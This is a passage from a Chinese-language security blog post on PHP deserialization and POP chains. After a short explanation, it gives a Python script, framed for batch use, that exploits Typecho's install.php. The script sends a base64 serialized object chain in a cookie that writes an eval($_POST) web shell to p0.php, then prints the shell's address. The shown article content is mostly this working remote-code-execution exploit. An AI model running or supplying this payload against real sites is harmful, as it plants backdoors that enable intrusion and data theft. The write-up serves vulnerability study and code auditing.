&#xFF08;&#x51FD;&#x6570;&#x5C06;&#x7528;&#x6237;&#x81EA;&#x5B9A;&#x4E49;&#x51FD;&#x6570;&#x4F5C;&#x7528;&#x5230;&#x6570;&#x7EC4;&#x4E2D;&#x7684;&#x6BCF;&#x4E2A;&#x503C;&#x4E0A;&#xFF0C;&#x5E76;&#x8FD4;&#x56DE;&#x7528;&#x6237;&#x81EA;&#x5B9A;&#x4E49;&#x51FD;&#x6570;&#x4F5C;&#x7528;&#x540E;&#x7684;&#x5E26;&#x6709;&#x65B0;&#x503C;&#x7684;&#x6570;&#x7EC4;&#x3002;&#xFF09;"></a>array_map() &#xFF08;&#x51FD;&#x6570;&#x5C06;&#x7528;&#x6237;&#x81EA;&#x5B9A;&#x4E49;&#x51FD;&#x6570;&#x4F5C;&#x7528;&#x5230;&#x6570;&#x7EC4;&#x4E2D;&#x7684;&#x6BCF;&#x4E2A;&#x503C;&#x4E0A;&#xFF0C;&#x5E76;&#x8FD4;&#x56DE;&#x7528;&#x6237;&#x81EA;&#x5B9A;&#x4E49;&#x51FD;&#x6570;&#x4F5C;&#x7528;&#x540E;&#x7684;&#x5E26;&#x6709;&#x65B0;&#x503C;&#x7684;&#x6570;&#x7EC4;&#x3002;&#xFF09;</h4><pre><code>&#x5B9E;&#x4F8B;&#xFF1A;    &#x5C06;&#x51FD;&#x6570;&#x4F5C;&#x7528;&#x5230;&#x6570;&#x7EC4;&#x4E2D;&#x7684;&#x6BCF;&#x4E2A;&#x503C;&#x4E0A;&#xFF0C;&#x6BCF;&#x4E2A;&#x503C;&#x90FD;&#x4E58;&#x4EE5;&#x672C;&#x8EAB;&#xFF0C;&#x5E76;&#x8FD4;&#x56DE;&#x5E26;&#x6709;&#x65B0;&#x503C;&#x7684;&#x6570;&#x7EC4;&#x3002;
&lt;?php
    function myfunction($v)
    {
      return($v*$v);
    }
    $a=array(1,2,3,4,5);
    print_r(array_map(&quot;myfunction&quot;,$a));
?&gt;
&#x53C2;&#x8003;&#xFF1A;http://www.w3school.com.cn/php/func_array_map.asp
</code></pre><h4 id="pop&#x94FE;&#x7684;&#x5229;&#x7528;"><a href="#pop&#x94FE;&#x7684;&#x5229;&#x7528;" class="headerlink" title="pop&#x94FE;&#x7684;&#x5229;&#x7528;"></a>pop&#x94FE;&#x7684;&#x5229;&#x7528;</h4><pre><code>&#x4EE5;&#x524D;&#x7406;&#x89E3;&#x7684;&#x5E8F;&#x5217;&#x5316;&#x653B;&#x51FB;&#x66F4;&#x591A;&#x7684;&#x662F;&#x5728;&#x9B54;&#x672F;&#x65B9;&#x6CD5;&#x4E2D;&#x51FA;&#x73B0;&#x4E00;&#x4E9B;&#x5229;&#x7528;&#x7684;&#x6F0F;&#x6D1E;&#xFF0C;&#x56E0;&#x4E3A;&#x81EA;&#x52A8;&#x8C03;&#x7528;&#x4ECE;&#x800C;&#x89E6;&#x53D1;&#x6F0F;&#x6D1E;&#x3002;
&#x4F46;&#x5982;&#x679C;&#x5173;&#x952E;&#x4EE3;&#x7801;&#x4E0D;&#x5728;&#x9B54;&#x672F;&#x65B9;&#x6CD5;&#x4E2D;&#xFF0C;&#x800C;&#x662F;&#x5728;&#x4E00;&#x4E2A;&#x7C7B;&#x7684;&#x666E;&#x901A;&#x65B9;&#x6CD5;&#x4E2D;&#x3002;&#x8FD9;&#x65F6;&#x5019;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;&#x5BFB;&#x627E;&#x76F8;&#x540C;&#x7684;&#x51FD;&#x6570;&#x540D;&#x5C06;&#x7C7B;&#x7684;&#x5C5E;&#x6027;&#x548C;&#x654F;&#x611F;&#x51FD;&#x6570;&#x7684;&#x5C5E;&#x6027;&#x8054;&#x7CFB;&#x8D77;&#x6765;&#x3002;

&#x628A;&#x9B54;&#x672F;&#x65B9;&#x6CD5;&#x4F5C;&#x4E3A;&#x6700;&#x5F00;&#x59CB;&#x7684;&#x5C0F;&#x7EC4;&#x4EF6;&#xFF0C;&#x7136;&#x540E;&#x5728;&#x9B54;&#x672F;&#x65B9;&#x6CD5;&#x4E2D;&#x8C03;&#x7528;&#x5176;&#x4ED6;&#x51FD;&#x6570;(&#x5C0F;&#x7EC4;&#x4EF6;)&#xFF0C;&#x901A;&#x8FC7;&#x5BFB;&#x627E;&#x76F8;&#x540C;&#x540D;&#x5B57;&#x7684;&#x51FD;&#x6570;&#xFF0C;&#x518D;&#x4E0E;&#x7C7B;&#x4E2D;&#x7684;&#x654F;&#x611F;&#x51FD;&#x6570;&#x548C;&#x5C5E;&#x6027;&#x76F8;&#x5173;&#x8054;&#xFF0C;&#x5C31;&#x662F;POP CHAIN &#x3002;&#x6B64;&#x65F6;&#x7C7B;&#x4E2D;&#x6240;&#x6709;&#x7684;&#x654F;&#x611F;&#x5C5E;&#x6027;&#x90FD;&#x5C5E;&#x4E8E;&#x53EF;&#x63A7;&#x7684;&#x3002;&#x5F53;unserialize()&#x4F20;&#x5165;&#x7684;&#x53C2;&#x6570;&#x53EF;&#x63A7;&#xFF0C;&#x4FBF;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;&#x63A7;&#x5236;POP CHAIN&#x8FBE;&#x5230;&#x5229;&#x7528;&#x7279;&#x5B9A;&#x6F0F;&#x6D1E;&#x7684;&#x6548;&#x679C;&#x3002;
</code></pre><h3 id="&#x6279;&#x91CF;&#x6253;"><a href="#&#x6279;&#x91CF;&#x6253;" class="headerlink" title="&#x6279;&#x91CF;&#x6253;"></a>&#x6279;&#x91CF;&#x6253;</h3><figure class="highlight python hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="hljs-keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">poc</span><span class="hljs-params">(url)</span>:</span></span><br><span class="line">    url = url <span class="hljs-keyword">if</span> url.startswith(<span class="hljs-string">&apos;http://&apos;</span>) <span class="hljs-keyword">else</span> <span class="hljs-string">&apos;http://&apos;</span>+url</span><br><span class="line">    <span class="hljs-keyword">print</span> url</span><br><span class="line">    target = url+<span class="hljs-string">&apos;/install.php?finish&apos;</span></span><br><span class="line">    headers = {</span><br><span class="line">        <span class="hljs-string">&apos;User-Agent&apos;</span>: <span class="hljs-string">&apos;Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0&apos;</span>,</span><br><span class="line">        <span class="hljs-string">&apos;Referer&apos;</span>:<span class="hljs-string">&apos;http://localhost:85/install.php&apos;</span>,</span><br><span class="line">        <span class="hljs-string">&apos;cookie&apos;</span>:<span class="hljs-string">&quot;__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTc6ImZpbGVfcHV0X2NvbnRlbnRzKCdwMC5waHAnLCAnPD9waHAgQGV2YWwoJF9QT1NUW3AwXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NzoidHlwZWNobyI7fQ==&quot;</span></span><br><span class="line">        }</span><br><span class="line">    <span class="hljs-keyword">try</span>:</span><br><span class="line">        html = requests.get(url=target,headers=headers,timeout=<span class="hljs-number">3</span>)</span><br><span class="line">        <span class="hljs-keyword">if</span> html.status_code == <span class="hljs-number">404</span>:</span><br><span class="line">            <span class="hljs-keyword">return</span> <span class="hljs-string">&apos;the file install.php is not exists&apos;</span></span><br><span class="line">        <span class="hljs-keyword">print</span> <span class="hljs-string">&apos;shell:&apos;</span>, url+<span class="hljs-string">&apos;p0.php&apos;</span></span><br><span class="line">    <span class="hljs-keyword">except</span> Exception  ,e:</span><br><span class="line">        <span class="hljs-keyword">print</span> e</span><br><span class="line">        <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&apos;__main__&apos;</span>:</span><br><span class="line">    url = <span class="hljs-string">&apos;http://localhost:85/&apos;</span></span><br><span class="line">    poc(url)</span><br></pre></td></tr></table></figure>
    
    </div>
    
    <div class="columns is-variable is-1 is-multiline is-mobile">
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/反序列化/">#反序列化</a></span>
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/代码审计/">#代码审计</a></span>
    
    </div>
    
    
    <div class="columns is-mobile is-multiline article-nav">
        <span class="column is-12-mobile is-half-desktop  article-nav-prev">
            
            <a href="/2019/01/01/XSS_02_XSS备忘录/">XSS O2 XSS备忘录</a>
            
        </span>
        <span class="column is-12-mobile is-half-desktop  article-nav-next">
            
            <a href="/2018/01/01/湖湘杯check_code/">湖湘杯的一个check code题</a>
            
        </span>
    </div>
    
</article>




    </div>
</section>
    <footer class="footer">
    <div class="container">
        <div class="columns content">
            <div class="column is-narrow has-text-centered">
                &copy; 2020 Threezh1&nbsp;
                Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> & <a href="http://github.com/ppoffice/hexo-theme-minos">Minos</a>
            </div>
            <div class="column is-hidden-mobile"></div>

            
            <div class="column is-narrow">
                <div class="columns is-mobile is-multiline is-centered">
                
                    
                <a class="column is-narrow has-text-black" title="GitHub" href="https://github.com/Threezh1">
                    
                    GitHub
                    
                </a>
                
                </div>
            </div>
            
            
        </div>
    </div>
</footer>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script>

<!-- test if the browser is outdated -->
<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.js"></script>
<script>
    $(document).ready(function () {
        // plugin function, place inside DOM ready function
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        })
    });
</script>

<script>
    window.FontAwesomeConfig = {
        searchPseudoElements: true
    }
    moment.locale("chinese");
</script>


    
    
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.4/MathJax.js?config=TeX-MML-AM_CHTML"></script>
<script>
    MathJax.Hub.Config({
        "HTML-CSS": {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
</script>

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.10.0/dist/katex.min.css" integrity="sha384-9eLZqc9ds8eNjO3TmqPeYcDj8n+Qfa4nuSiGYa6DjLNcv9BtN69ZIulL9+8CqC9Y" crossorigin="anonymous">
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.10.0/dist/katex.min.js" integrity="sha384-K3vbOmF2BtaVai+Qk37uypf7VrgBubhQreNQe9aGsz9lB63dIFiQVlJbr92dw2Lx" crossorigin="anonymous"></script>
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.10.0/dist/contrib/auto-render.min.js" integrity="sha384-kmZOZB5ObwgQnS/DuDg6TScgOiWWBiVt0plIRkZCmE6rDZGrEOQeHM5PcHi+nyqe" crossorigin="anonymous" onload="renderMathInElement(document.body);"></script>

<script>
document.addEventListener("DOMContentLoaded", function() {
    renderMathInElement(document.body, {
        // ...options...
    });
});
</script>

    
    
<script src="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/js/lightgallery-all.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/js/jquery.justifiedGallery.min.js"></script>
<script>
    (function ($) {
        $(document).ready(function () {
            if (typeof($.fn.lightGallery) === 'function') {
                $('.article.gallery').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof($.fn.justifiedGallery) === 'function') {
                $('.justified-gallery').justifiedGallery();
            }
        });
    })(jQuery);
</script>

    
    
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.0/clipboard.min.js"></script>
    <style>
        .hljs {
            position: relative;
        }

        .hljs .clipboard-btn {
            float: right;
            color: #9a9a9a;
            background: none;
            border: none;
            cursor: pointer;
        }

        .hljs .clipboard-btn:hover {
          color: #8a8a8a;
        }

        .hljs > .clipboard-btn {
            display: none;
            position: absolute;
            right: 4px;
            top: 4px;
        }

        .hljs:hover > .clipboard-btn {
            display: inline;
        }

        .hljs > figcaption > .clipboard-btn {
            margin-right: 4px;
        }
    </style>
    <script>
      $(document).ready(function () {
        $('figure.hljs').each(function(i, figure) {
          var codeId = 'code-' + i;
          var code = figure.querySelector('.code');
          var copyButton = $('<button>Copy <i class="far fa-clipboard"></i></button>');
          code.id = codeId;
          copyButton.addClass('clipboard-btn');
          copyButton.attr('data-clipboard-target-id', codeId);

          var figcaption = figure.querySelector('figcaption');

          if (figcaption) {
            figcaption.append(copyButton[0]);
          } else {
            figure.prepend(copyButton[0]);
          }
        })

        var clipboard = new ClipboardJS('.clipboard-btn', {
          target: function(trigger) {
            return document.getElementById(trigger.getAttribute('data-clipboard-target-id'));
          }
        });
        clipboard.on('success', function(e) {
          e.clearSelection();
        })
      })
    </script>

    


<script src="/js/script.js"></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-mask"></div>
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="Type something...">
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: 'Posts',
                PAGES: 'Pages',
                CATEGORIES: 'Categories',
                TAGS: 'Tags',
                UNTITLED: '(Untitled)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js"></script>
    
</body>
</html>